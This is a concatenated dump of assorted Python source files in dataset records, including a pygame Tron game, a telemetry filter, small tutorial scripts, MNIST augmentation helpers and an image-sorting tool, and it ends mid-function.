pygame.draw.rect(screen, ([255, 0, 0]), [99, 681, 400, 20])\n pygame.draw.rect(screen, ([255, 0, 0]), [99, 0, 400, 18])\n pygame.draw.rect(screen, ([255, 0, 0]), [0, 0, 99, 700])\n\n\n if score1 - score2 == 1:\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 0, 400, 18])\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 681, 400, 20])\n if score1 - score2 == 2:\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 0, 500, 18])\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 681, 500, 20])\n if score1 - score2 == 3:\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 0, 602, 18])\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 681, 602, 20])\n if score1 - score2 == 4:\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 0, 604, 18])\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 681, 604, 20])\n pygame.draw.rect(screen, ([0, 0, 255]), [701, 0, 100, 200])\n pygame.draw.rect(screen, ([0, 0, 255]), [701, 500, 100, 200])\n if score1 - score2 > 4:\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 0, 604, 18])\n pygame.draw.rect(screen, ([0, 0, 255]), [98, 681, 604, 20])\n pygame.draw.rect(screen, ([0, 0, 255]), [701, 0, 99, 700])\n\n score_font = font_score.render('%s' % (score1), True, (255, 255, 255))\n score_rect = score_font.get_rect()\n score_rect.topleft = (30, 300)\n score_font2 = font_score.render('%s' % (score2), True, (255, 255, 255))\n score_rect2 = score_font.get_rect()\n score_rect2.topleft = (730, 300)\n if num_players == 1:\n score_font = font_score.render('%s' % (score), True, (255, 255, 255))\n score_top = font_scor.render('SCORE', True, (255, 255, 255))\n score_rec = score_top.get_rect()\n score_rec.topleft = (12, 270)\n screen.blit(score_top, score_rec)\n\n score_top2 = font_scoretop.render('TOP SCORE', True, (255, 255, 255))\n score_rec2 = score_top.get_rect()\n score_rec2.topleft = (708, 270)\n screen.blit(score_top2, score_rec2)\n score_font2 = font_score.render('%s' % (last_score), True, (255, 255, 255))\n if score > 9:\n score_rect.topleft = (10, 300)\n if score1 > 9:\n score_rect.topleft = (10, 300)\n if score2 > 9:\n score_rect2.topleft = (710, 300)\n if last_score > 9:\n score_rect2.topleft = (710, 300)\n\n screen.blit(score_font, score_rect)\n screen.blit(score_font2, score_rect2)\n\n\n #screen.blit(power, power_pos - 10)\n '''for x in range(0, 600, 10): # Draw vertical lines\n pygame.draw.line(screen, (8, 232, 235), (x, 0), (x, 600))\n for y in range(0, 600, 10): # Draw vertical lines\n pygame.draw.line(screen, (8, 232, 235), (0, y), (600, y))'''\n if not start and not move:\n screen.blit(font_start.render('APERTE ENTER PARA COMEÇAR', True, (255, 255, 255)), (150, 300))\n\n if time:\n pygame.draw.rect(screen, ([7, 8, 14]), [150, 300, 510, 50])\n for pos in car:\n screen.blit(car_skin, pos)\n screen.blit(rotate_D, (pos))\n if num_players == 2:\n for pos in car2:\n screen.blit(car2_skin, pos)\n screen.blit(rotate_D, (pos))\n pygame.display.update()\n sleep(0.5)\n screen.blit(fonte_coord.render('3', True, (255, 255, 255)), (390, 300))\n for pos in car:\n screen.blit(car_skin, pos)\n screen.blit(rotate_D, (pos))\n if num_players == 2:\n for pos in car2:\n screen.blit(car2_skin, pos)\n screen.blit(rotate_D, (pos))\n pygame.display.update()\n moeda_sound = mixer.Sound('select_002.ogg')\n moeda_sound.play()\n sleep(0.5)\n pygame.draw.rect(screen, ([7, 8, 14]), [390, 300, 120, 70])\n\n screen.blit(fonte_coord.render('2', True, (255, 255, 255)), (390, 300))\n for pos in car:\n screen.blit(car_skin, pos)\n screen.blit(rotate_D, (pos))\n if num_players == 2:\n for pos in car2:\n screen.blit(car2_skin, pos)\n screen.blit(rotate_D, (pos))\n pygame.display.update()\n moeda_sound = mixer.Sound('select_002.ogg')\n moeda_sound.play()\n sleep(0.5)\n pygame.draw.rect(screen, ([7, 8, 14]), [390, 300, 120, 70])\n\n screen.blit(fonte_coord.render('1', True, (255, 255, 255)), (390, 300))\n for pos in car:\n screen.blit(car_skin, pos)\n screen.blit(rotate_D, (pos))\n if num_players == 2:\n for pos in car2:\n screen.blit(car2_skin, pos)\n screen.blit(rotate_D, (pos))\n pygame.display.update()\n moeda_sound = mixer.Sound('select_002.ogg')\n moeda_sound.play()\n sleep(0.5)\n pygame.draw.rect(screen, ([7, 8, 14]), [390, 300, 120, 70])\n direction_player1 = DOWN\n direction_player2 = K_s\n time = False\n move = True\n\n\n\n for pos in car:\n screen.blit(car_skin, pos)\n if car[0] and direction_player1 == UP:\n screen.blit(rotate_up, (pos))\n if car[0] and direction_player1 == DOWN:\n screen.blit(rotate_D, (pos))\n if car[0] and direction_player1 == LEFT:\n screen.blit(rotate_L, (pos))\n if car[0] and direction_player1 == RIGHT:\n screen.blit(rotate_R, (pos))\n if num_players == 2:\n for pos in car2:\n screen.blit(car2_skin, pos)\n if car2[0] and direction_player2 == K_w:\n screen.blit(rotate_up, (pos))\n if car2[0] and direction_player2 == K_s:\n screen.blit(rotate_D, (pos))\n if car2[0] and direction_player2 == K_a:\n screen.blit(rotate_L, (pos))\n if car2[0] and direction_player2 == K_d:\n screen.blit(rotate_R, (pos))\n\n pygame.display.update()\n while True:\n if empate:\n screen.blit(fonte_coord.render('EMPATE', True, (255, 255, 255)), (280, 300))\n pygame.display.update()\n sleep(2)\n start_the_game()\n elif game_over_player1:\n game_over_font = pygame.font.Font('freesansbold.ttf', 35)\n game_over_screen = game_over_font.render('JOGADOR AZUL VENCEU', True, (20, 20, 255))\n if num_players == 1:\n game_over_screen = game_over_font.render('YOU LOSE', True, (20, 20, 255))\n if score > last_score:\n last_score = score\n if num_players == 2:\n score1 = score1 + 1\n game_over_rect = game_over_screen.get_rect()\n game_over_rect.midtop = (400, 300)\n screen.blit(game_over_screen, game_over_rect)\n pygame.display.update()\n moeda_sound = mixer.Sound('win_sound.wav')\n moeda_sound.play()\n sleep(3)\n start_the_game()\n elif game_over_player2:\n game_over_font = pygame.font.Font('freesansbold.ttf', 35)\n game_over_screen = game_over_font.render('JOGADOR VERMELHO VENCEU', True, (255, 30, 30))\n score2 = score2 + 1\n game_over_rect = game_over_screen.get_rect()\n game_over_rect.midtop = (400, 300)\n screen.blit(game_over_screen, game_over_rect)\n pygame.display.update()\n moeda_sound = mixer.Sound('win_sound.wav')\n moeda_sound.play()\n sleep(3)\n start_the_game()\n\n screen.blit(fonte_coord.render((score), True, (255, 255, 255)), (10, 300))\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n exit()\n\n\ndef menu1():\n pygame.init()\n surface = pygame.display.set_mode((700, 700))\n\n engine = sound.Sound()\n engine.set_sound(sound.SOUND_TYPE_CLICK_MOUSE, 'select_002.ogg')\n menu = pygame_menu.Menu(400, 600, 'Tron',\n theme=pygame_menu.themes.THEME_DARK)\n\n menu.add_image('tronn.png', angle=0, scale=(0.4, 0.4))\n\n menu.set_sound(engine, recursive=True)\n\n menu.add_button('Começar', menu2)\n\n menu.mainloop(surface)\n\n\ndef menu2():\n pygame.init()\n\n surface = pygame.display.set_mode((700, 700))\n menu = pygame_menu.Menu(400, 600, 'Tron',\n theme=pygame_menu.themes.THEME_DARK)\n\n engine = sound.Sound()\n engine.set_sound(sound.SOUND_TYPE_CLICK_MOUSE, 'select_002.ogg')\n menu.set_sound(engine, recursive=True)\n\n\n menu.add_button('Jogar', menu3)\n menu.add_button('Sobre', menu4)\n menu.add_button('Sair', pygame_menu.events.EXIT)\n\n menu.mainloop(surface)\n\n\ndef menu3():\n pygame.init()\n\n surface = pygame.display.set_mode((700, 700))\n menu = pygame_menu.Menu(400, 600, 'Jogadores',\n theme=pygame_menu.themes.THEME_DARK)\n\n engine = sound.Sound()\n engine.set_sound(sound.SOUND_TYPE_CLICK_MOUSE, 'select_002.ogg')\n menu.set_sound(engine, recursive=True)\n\n menu.add_button('1 Jogador', player1)\n menu.add_button(\"2 Jogadores\", player2)\n menu.add_button('Voltar', menu2)\n\n menu.mainloop(surface)\n\ndef menu4():\n pygame.init()\n\n surface = pygame.display.set_mode((700, 700))\n menu = pygame_menu.Menu(400, 600, 'Regras',\n theme=pygame_menu.themes.THEME_DARK)\n engine = sound.Sound()\n engine.set_sound(sound.SOUND_TYPE_CLICK_MOUSE, 'select_002.ogg')\n menu.set_sound(engine, recursive=True)\n\n regras= \"O jogo é formado por duas pessoas que controlam os Trons, \"\\\n \"usando as setinhas do teclado um jogador se move e o outro jogador \"\\\n \"para se mover irá utilizar o famoso WASD.\"\\\n \"Durante a partida alguns poderes irão aparecer, deixando cada vez mais \"\\\n \"o jogo dinâmico e competitivo. \"\\\n \"Vença o seu adversário não encostando e nem esbarrando em nada e tente \"\\\n \"pegar poderes para que você consiga ter certas vantagens. \"\\\n \"Boa Sorte!!\"\n\n font = pygame_menu.font.FONT_HELVETICA\n\n menu.add_label(regras, max_char=-1,font_size=20, font_name=font)\n\n menu.add_button(\"Poder\",menu5)\n menu.add_button('Voltar', menu2)\n\n menu.mainloop(surface)\n\ndef player1():\n pygame.init()\n\n surface = pygame.display.set_mode((700, 700))\n menu = pygame_menu.Menu(400, 600, 'Jogador 1',\n theme=pygame_menu.themes.THEME_DARK)\n engine = sound.Sound()\n engine.set_sound(sound.SOUND_TYPE_CLICK_MOUSE, 'select_002.ogg')\n menu.set_sound(engine, recursive=True)\n\n menu.add_image('tron.png', angle=0, scale=(1, 1))\n menu.add_button(\"Vamos\", start_the_game1)\n menu.add_button('Voltar', menu3)\n\n menu.mainloop(surface)\n\ndef player2():\n pygame.init()\n\n surface = pygame.display.set_mode((700, 800))\n menu = pygame_menu.Menu(500, 700, 'Jogador 2',\n theme=pygame_menu.themes.THEME_DARK)\n engine = sound.Sound()\n engine.set_sound(sound.SOUND_TYPE_CLICK_MOUSE, 'select_002.ogg')\n menu.set_sound(engine, recursive=True)\n\n menu.add_image('tron.png', angle=0, scale=(0.7, 0.7))\n menu.add_image('tron.png', angle=0, scale=(0.7, 0.7))\n menu.add_button(\"Vamos\", start_the_game)\n menu.add_button('Voltar', menu3)\n\n menu.mainloop(surface)\n\ndef menu5():\n pygame.init()\n\n surface = pygame.display.set_mode((700, 800))\n menu = pygame_menu.Menu(500, 700, 'Poder',\n theme=pygame_menu.themes.THEME_DARK)\n engine = sound.Sound()\n engine.set_sound(sound.SOUND_TYPE_CLICK_MOUSE, 'select_002.ogg')\n menu.set_sound(engine, recursive=True)\n\n text1 = \"Aumenta muito o tamanho.\"\n\n text2 = \"Aumenta a velocidade.\"\n\n text3 = \"Aumenta muito pouco o tamanho\"\n\n menu.add_image('cogumelo.png', angle=0, scale=(0.5, 0.5))\n\n font = pygame_menu.font.FONT_HELVETICA\n\n menu.add_label(text1, max_char=-1,font_size=20, font_name=font)\n\n menu.add_image('sonic.png', angle=0, scale=(0.5, 0.5))\n\n menu.add_label(text2, max_char=-1,font_size=20, font_name=font)\n\n menu.add_image('moeda_mario.png', angle=0, scale=(0.5,0.5))\n\n menu.add_label(text3, max_char=-1,font_size=20, font_name=font)\n\n menu.add_button('Voltar', menu2)\n\n menu.mainloop(surface)\n\nmenu1()","sub_path":"isolate-SO-master/exe.win-amd64-3.8/Tron1.9.py","file_name":"Tron1.9.py","file_ext":"py","file_size_in_byte":28512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"141367868","text":"#! /usr/bin/python\n\nimport argparse\nimport csv\nfrom collections import defaultdict\n\ndef get_args():\n\n #create and argumentparser object('parser') that will hold all info to parse the cmd line\n parser = argparse.ArgumentParser(description = 'This script removes false frequency-code pairs from telemetry data')\n\n #positional arguments\n #number argument to input\n parser.add_argument('tags_file', help='The list of real telemetry frequencies and codes')\n parser.add_argument('data_file', help='Tlemetry data')\n\n #parse the cmd line arguments\n return parser.parse_args()\n\ndef parse_tags():\n # codes dictionary: key = frequency, value = list of real codes\n codes = defaultdict(dict)\n\n # opening and reading tags file\n with open(args.tags_file, 'r') as tags: \n #create a csv reader object\n reader = csv.reader(tags, delimiter='\\t')\n\n #skip the header line\n header = next(reader)\n\n # read in file line by line\n for line in reader:\n\n #skip blank lines\n if not line:\n continue\n \n else:\n # need to ask if key exists already\n if line[0] in codes:\n # same as appending to a regular list\n codes[line[0]].append(line[1])\n else:\n codes[line[0]] = []\n codes[line[0]].append(line[1])\n\n #check our work\n for freq,code in codes.items():\n print(freq, code)\n \n return codes\n\ndef parse_data(code_dict):\n\n # open, read, and parse the telemetry data file\n with open(args.data_file, 'r') as data:\n for line in data:\n\n # by default, .split works on white space no matter how many characters\n row = line.split()\n\n #skip the header, could make the value an optional input\n if row[0] == 'Date':\n print(line, end=' ')\n continue\n \n else:\n if row[5] in code_dict[row[4]]:\n print(line, end=' ')\n else:\n continue\n\ndef main():\n code_dict = parse_tags()\n parse_data(code_dict)\n\n#get the arguments before calling main\nargs = get_args()\n\n#execute the program by calling main. __ __allow you to call these functions in other scripts and not just through this one\nif __name__ == '__main__':\n main() \n\n\n","sub_path":"2019-04-17_clean_telemetry.py","file_name":"2019-04-17_clean_telemetry.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"221807519","text":"dictionaryOne ={}\n\naSampleList = [1,2,3,4]\n\n\n#add values to dictionaryOne\n#Method 1\ndictionaryOne = {\n 'key1': 'value1',\n 'key2': 'value2',\n 'key3': 'value3',\n 'key7' :[ 'value2', 'value4']\n}\n\n#or method 2\n\ndictionaryTwo = {}\n\ndictionaryTwo['key4'] = 'value4'\ndictionaryTwo['key5'] = 'value5'\ndictionaryTwo['key6'] = 'value6'\n\n\nprint(aSampleList) \nprint(dictionaryOne)\nprint(dictionaryTwo)\n\n#to delete a value\ndictionaryOne.pop('key1')\n\n#for looping a dictionary\n# for each key value pair in items in dictionaries \nfor key,value in dictionaryTwo.items():\n print(\"I have\"+key+\" relating with \" +value)\n print(\"list in dictionarisies\" + key7[1])\n\nprint(dictionaryOne)","sub_path":"dictionaries.py","file_name":"dictionaries.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"559609771","text":"def leiaint(msg):\n \"\"\"\n Codigo pra validação de numero inteiro\n :param msg: Valor recebido\n :return: A int do Numero digitado.\n \"\"\"\n ok = False\n valor = 0\n while True:\n n = str(input(msg))\n if n.isnumeric():\n valor = int(n)\n ok = True\n else:\n print(f'\\033[0;31mERRO! Numero invalido.\\033[m')\n if ok:\n break\n return valor\n\n\nn = leiaint(\"Digite um numero: \")\nprint(f'Voce acabou de digitar o numero {n}')","sub_path":"exercicios/ex104.py","file_name":"ex104.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"409735091","text":"import webbrowser\n\n\nclass Movie():\n \"\"\"This class provides a way to store movie-related information.\n\n Attributes:\n title (str): title of the movie.\n storyline (str): brief synopsis of the movie.\n poster_image_url (str): URL of the image thumbnail to be displayed with\n each movie.\n trailer_youtube_url (str): URL of video to be played when movie\n thumbnail is clicked.\n \"\"\"\n VALID_RATINGS = [\"G\", \"PG\", \"PG-13\", \"R\"]\n\n def __init__(self,\n movie_title,\n movie_storyline,\n poster_image,\n trailer_youtube):\n self.title = movie_title\n self.storyline = movie_storyline\n self.poster_image_url = poster_image\n self.trailer_youtube_url = trailer_youtube\n\n def show_trailer(self):\n \"\"\"Play the movie trailer in the browser.\"\"\"\n webbrowser.open(self.trailer_youtube_url)\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"97936393","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 13 20:35:55 2018\n\n@author: sanjotraibagkar\n\"\"\"\n\n\nfrom nsepy import get_history\nfrom datetime import date\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n\nstock=\"SBIN\"\nstart=start=date(2017,12,26)\nend=date(2018,1,25)\nend2=date(2018,2,6)\ndata_fut = get_history(symbol=stock,start=start, end=end,futures=True,expiry_date=date(2018,1,25))\ndata_fut2 = get_history(symbol=stock,start=start, end=end2,futures=True, \n expiry_date=date(2018,2,22))\n\nOI_combined= pd.concat([data_fut2['Open Interest'],data_fut['Open Interest']],\n axis=1)\nOI_combined['OI_Combined']=OI_combined.sum(axis=1)\n\n\nplt.figure(1,figsize=(10,9))\nplt.subplot(211)\nplt.title('Open Interest')\nplt.plot(OI_combined.OI_Combined)\nplt.plot(OI_combined.OI_Combined.rolling(5).mean())\nplt.legend(['OI','OI_mean'])\n\nC_combined= pd.concat([data_fut2['Close'],data_fut['Close']],axis=1)\nC_combined['Continous_Close']=C_combined.iloc[:,1].fillna(C_combined.iloc[:,0])\n\nO_combined= pd.concat([data_fut2['Open'],data_fut['Open']],axis=1)\nO_combined['Continous_Open']=O_combined.iloc[:,1].fillna(O_combined.iloc[:,0])\n\nplt.subplot(212)\nplt.title('Close')\nplt.plot(C_combined.Continous_Close)\nplt.plot(O_combined.Continous_Open)\nplt.plot(C_combined.Continous_Close.rolling(5).mean())\nplt.legend(['Close','Open','Close_mean'])\n\nplt.show()","sub_path":"Phase2-OptionValuation/openintrestinoption.py","file_name":"openintrestinoption.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"317511529","text":"try:\n import numpy\n import cv2\n opencv = True\nexcept:\n opencv = False\nfrom PIL import ImageFile\nImageFile.LOAD_TRUNCATED_IMAGES = True\nfrom kivy.config import Config\nConfig.window_icon = \"data/icon.png\"\nfrom kivy.properties import StringProperty\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.treeview import TreeViewNode\nfrom kivy.lang.builder import Builder\n\nBuilder.load_string(\"\"\"\n:\n color_selected: app.selected_color\n odd_color: app.list_background_odd\n even_color: app.list_background_even\n size_hint_y: None\n height: app.button_scale\n orientation: 'horizontal'\n LeftNormalLabel:\n text: root.title\n\n\"\"\")\n\n\n\nclass TreeViewInfo(BoxLayout, TreeViewNode):\n \"\"\"Simple treeview node to display a line of text.\n Has two elements, they will be shown as: 'title: content'\"\"\"\n\n title = StringProperty()\n","sub_path":"screenAlbum/treeViewInfo.py","file_name":"treeViewInfo.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"616910027","text":"# coding = latin-1 \n\nimport math\n\nnum = float(input(\"Digite um numero: \"))\n\nquadrado = num * num\ncubo = num * num * num \n\nraizquad = math.sqrt(num)\nraizcub = num ** (1/3)\n\nprint(f\"O quadrado de {num}: {quadrado}\\nO cubo de {num}: {cubo}\\nA raiz quadrade de {num}: {raizquad}\\nA raiz cubica de {num}: {raizcub}\")","sub_path":"calculo.py","file_name":"calculo.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"141844281","text":"import random\nmy_list=[\"cat\",\"dog\",\"bird\",\"tiger\",\"bull\",\"rabit\",\"fish\",\"whale\"]\ndef hangman(word):\n wrong=0\n stages=[\"\",\n \"________ \",\n \"| \",\n \"| | \",\n \"| O \",\n \"| /|\\ \",\n \"| / \\ \",\n \"| \"\n ]\n rletters=list(word)\n board=[\"_\"]*len(word)\n win = False\n print(\"Welcome to Hangman!\")\n\n while wrong < len(stages)-1:\n print(\"\\n\")\n msg=\"guess a word\"\n char=input(msg)\n if char in rletters:\n cind=rletters.index(char)\n board[cind]=char\n rletters[cind]='$'\n else:\n wrong+=1\n print(\" \".join(board))\n e=wrong+1\n print(\"\\n\".join(stages[0:e]))\n if \"_\" not in board:\n print(\"you are winner!\")\n print(\" \".join(board))\n win=True\n break\n if not win:\n print(\"\\n\".join(stages[0:wrong+1]))\n print(\"you lose!the answer is {}.\".format(word))\n\nhangman(my_list[random.randint(0,7)])","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"440116216","text":"# -*- coding: utf-8 -*-\n\nfrom utils.db import cfmedb, Db\n\n\ndef get_configuration_details(db=None, ip_address=None):\n \"\"\"Return details that are necessary to navigate through Configuration accordions.\n\n Args:\n ip_address: IP address of the server to match. If None, uses hostname from\n ``conf.env['base_url']``\n\n Returns:\n If the data weren't found in the DB, :py:class:`NoneType`\n If the data were found, it returns tuple `(region, server name, server id, server zone id)`\n \"\"\"\n if ip_address is None:\n ip_address = cfmedb().hostname\n\n if db is None:\n db = Db(hostname=ip_address)\n\n SEQ_FACT = 1e12\n miq_servers = db['miq_servers']\n for region in db.session.query(db['miq_regions']):\n reg_min = region.region * SEQ_FACT\n reg_max = reg_min + SEQ_FACT\n all_servers = db.session.query(miq_servers).all()\n server = None\n if len(all_servers) == 1:\n # If there's only one server, it's the one we want\n server = all_servers[0]\n else:\n # Otherwise, filter based on id and ip address\n def server_filter(server):\n return all([\n server.id >= reg_min,\n server.id < reg_max,\n # XXX: This currently fails due to public/private addresses on openstack\n server.ipaddress == ip_address\n ])\n servers = filter(server_filter, all_servers)\n if servers:\n server = servers[0]\n if server:\n return region.region, server.name, server.id, server.zone_id\n else:\n return None, None, None, None\n else:\n return None\n\n\ndef get_zone_description(zone_id, ip_address=None, db=None):\n if ip_address is None:\n ip_address = cfmedb().hostname\n\n if db is None:\n db = Db(hostname=ip_address)\n\n zones = list(\n db.session.query(db[\"zones\"]).filter(\n db[\"zones\"].id == zone_id\n )\n )\n if zones:\n return zones[0].description\n else:\n return None\n\n\ndef get_host_id(hostname, ip_address=None, db=None):\n if ip_address is None:\n ip_address = cfmedb().hostname\n\n if db is None:\n db = Db(hostname=ip_address)\n\n hosts = list(\n db.session.query(db[\"hosts\"]).filter(\n db[\"hosts\"].name == hostname\n )\n )\n if hosts:\n return str(hosts[0].id)\n else:\n return None\n","sub_path":"utils/db_queries.py","file_name":"db_queries.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"316453356","text":"import tensorflow as tf\nfrom data_preparation import mnist_data\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nfrom tensorflow.contrib.learn.python.learn.estimators.linear import LinearClassifier\nfrom sklearn.linear_model import Perceptron\nimport random\n\ndef load_data_set():\n\tdataset = mnist_data.load_mnist(reshape=True)\n\ttrain_set=dataset.train.images\n\ttrain_labels=dataset.train.labels\n\ttest_set=dataset.validation.images\n\ttest_labels=dataset.validation.labels\n\treturn train_set, train_labels, test_set, test_labels\n\ndef construct_feature_col(col_num=None):\n\tfeature_col = []\n\tfeature_dummy = []\n\tfeature_name_base = \"pixel_\"\n\tfor col_idx in range(col_num):\n\t\tfeature_col.append(tf.contrib.layers.real_valued_column(feature_name_base+str(col_idx)+\"th\"))\n\t\tfeature_dummy.append(feature_name_base+str(col_idx)+\"th\")\n\treturn feature_col, feature_dummy\n\ndef extract_for_binary(train_set=None, train_labels=None, test_set=None, test_labels=None):\n\tbinary_indices_train = []\n\tbinary_indices_test = []\n\tfor i in range(len(train_set)):\n\t\tif train_labels[i] == 6 or train_labels[i] == 8:\n\t\t\tbinary_indices_train.append(i)\n\tfor i in range(len(test_set)):\n\t\tif test_labels[i] == 6 or test_labels[i] == 8:\n\t\t\tbinary_indices_test.append(i)\n\ttrain_set_binary = np.take(train_set, binary_indices_train, axis=0)\n\ttrain_label_binary = np.take(train_labels, binary_indices_train)\n\ttest_set_binary = np.take(test_set, binary_indices_test, axis=0)\n\ttest_label_binary = np.take(test_labels, binary_indices_test)\n\treturn train_set_binary, train_label_binary, test_set_binary, test_label_binary\n\ndef input_fn(data_set=None, labels=None, feature_col=None):\n\t# Creates a dictionary mapping from each continuous feature column name (k) to\n\t# the values of that column stored in a constant Tensor.\n\tfeature_columns = {k_val: tf.constant(data_set[:, k_idx]) for k_idx, k_val in enumerate(feature_col)}\n\tlabel = tf.constant(labels)\n\treturn feature_columns, label\n\ndef down_sample(data_set=None, labels=None, down_sample_num=None):\n\tdown_sample_indices = np.random.randint(low=0, high=data_set.shape[0], size=down_sample_num)\n\tdown_samples = np.take(data_set, down_sample_indices, axis=0)\n\tdown_sample_labels = np.take(labels, down_sample_indices)\n\treturn down_samples, down_sample_labels\n\ndef random_crop(batch, crop_shape, padding=None):\n\tbatch=batch.reshape((batch.shape[0], int(np.sqrt(batch.shape[1])), int(np.sqrt(batch.shape[1]))))\n\toshape = np.shape(batch[0])\n\tif padding:\n\t oshape = (oshape[0] + 2*padding, oshape[1] + 2*padding)\n\tnew_batch = []\n\tnpad = ((padding, padding), (padding, padding))\n\tfor i in range(len(batch)):\n\t new_batch.append(batch[i])\n\t if padding:\n\t new_batch[i] = np.lib.pad(batch[i], pad_width=npad,\n\t mode='constant', constant_values=0)\n\t nh = random.randint(0, oshape[0] - crop_shape[0])\n\t nw = random.randint(0, oshape[1] - crop_shape[1])\n\t new_batch[i] = new_batch[i][nh:nh + crop_shape[0],\n\t nw:nw + crop_shape[1]]\n\treturn np.array(new_batch)\n\ndef flip_up_down(batch=None):\n\tbatch=batch.reshape((batch.shape[0], int(np.sqrt(batch.shape[1])), int(np.sqrt(batch.shape[1]))))\n\tfor i in range(len(batch)):\n\t\tbatch[i] = np.fliplr(batch[i])\n\treturn batch\n\nif __name__ == \"__main__\":\n\ttrain_set, train_labels, test_set, test_labels = load_data_set()\n\tnew_train_set = flip_up_down(train_set)\n\taug_train_set=new_train_set.reshape(new_train_set.shape[0], int(new_train_set.shape[1]**2))\n\tprint(aug_train_set.shape)\n#\taug_train_set=random_crop(train_set, (28,28), padding=2)\n#\taug_train_set=aug_train_set.reshape(aug_train_set.shape[0], int(aug_train_set.shape[1]**2))\n\tnew_data_set=np.concatenate((train_set,aug_train_set),axis=0)\n\tprint(new_data_set.shape)","sub_path":"src/cifar10_linear/mnist_linear_test.py","file_name":"mnist_linear_test.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"125782164","text":"# PYTHON - LOOP LISTS:\n# Loop through a list:\n\n# 1. FOR LOOP:\nthisList = ['apple', 'banana', 'violet']\nfor x in thisList:\n print(x)\n\n# 2. WHILE LOOP:\nL1 = ['siliva', 'supra', 'lemon']\ni = 0\nwhile i < len(thisList):\n print(thisList[i])\n i = i + 1\n\n","sub_path":"listsLoops.py","file_name":"listsLoops.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"450581457","text":"#!/usr/bin/env python\n\nimport sys\nimport glob\nimport os\nimport cv2\nimport gc\nfrom os import rename, listdir\nfrom tqdm import tqdm\nfrom multiprocessing import Pool, freeze_support\n\n# Locals\nfrom color_histogram.io_util.image import loadRGB, luminance\nfrom color_histogram.core.hist_1d import Hist1D\n\n# Pictures\ndef getPictures():\n pictures = glob.glob('./*jpg')\n parent = pictures[0]\n pictures.pop(0)\n return parent, pictures\ndef renamePictures(sortedPictures):\n directory = os.getcwd()\n for i, picture in enumerate(sortedPictures):\n current = directory+'/'+picture[2:len(picture)]\n new = directory+'/'+str(i)+'_'+picture[2:len(picture)]\n os.rename(current, new)\n\n# Luminance\ndef getLum(pic):\n img = loadRGB(pic)\n lum = luminance(img)\n del img\n gc.collect()\n return ((lum_average(lum), pic))\ndef lum_average(array):\n result = 0\n length = 0\n for row in array:\n for element in row:\n result += element\n length += 1\n return result / length\ndef sortLum(parent, this_pictures):\n pictures = this_pictures[:]\n pictures.insert(0, parent)\n\n pool = Pool(4)\n lums = pool.map(getLum, pictures)\n pool.close()\n pool.join()\n\n lums.sort(key=lambda x: x[0])\n\n pictureNames = []\n for pic in lums:\n pictureNames.append(pic[1])\n renamePictures(pictureNames)\n\n# Color\ndef compare(image_file1, image_file2):\n def histogram(image_file):\n image = loadRGB(image_file)\n hist1D = Hist1D(image, num_bins=12)\n densities = hist1D.colorDensities()\n rgbColors = hist1D.rgbColors()\n colors = map(lambda x: x*255, rgbColors)\n return list(zip(densities, colors))\n\n def difference(a,b):\n length = min(len(a), len(b))\n c = []\n for i in range(length):\n vec = []\n for j in range(len(a[i])):\n vec.append(abs(a[i][j] - b[i][j]))\n c.append(vec)\n return c\n\n def average(diff):\n avg_den = 0\n avg_rgb = 0\n for el in diff:\n avg_den += el[0]\n avg_rgb += ( sum(el[1]) / len(el[1]) )\n avg_den /= len(diff)\n avg_rgb /= len(diff)\n return avg_den, avg_rgb\n\n im1 = histogram(image_file1)\n im2 = histogram(image_file2)\n\n diff = difference(im1, im2)\n avg_den, avg_rgb = average(diff)\n\n del im1\n del im2\n gc.collect()\n\n return avg_den, avg_rgb, image_file2\ndef clusterPictures(parent, pictures):\n clusters = []\n for pic in tqdm(pictures, desc='Color'):\n clusters.append(compare(parent, pic))\n clusters.sort(key=lambda x: x[1])\n clusters.insert(0, [0,0,parent])\n return clusters\ndef sortColor(parent, pictures):\n def getNames(clusters):\n result = []\n for cluster in clusters:\n try:\n result.append(cluster[2])\n except:\n pass\n return result\n\n clusters = clusterPictures(parent, pictures)\n names = getNames(clusters)\n renamePictures(names)\n\n# Entry\ndef main():\n def print_help():\n print('-d\\t--debug: Enables debug for when this thing does a thing that gives you a spook.')\n 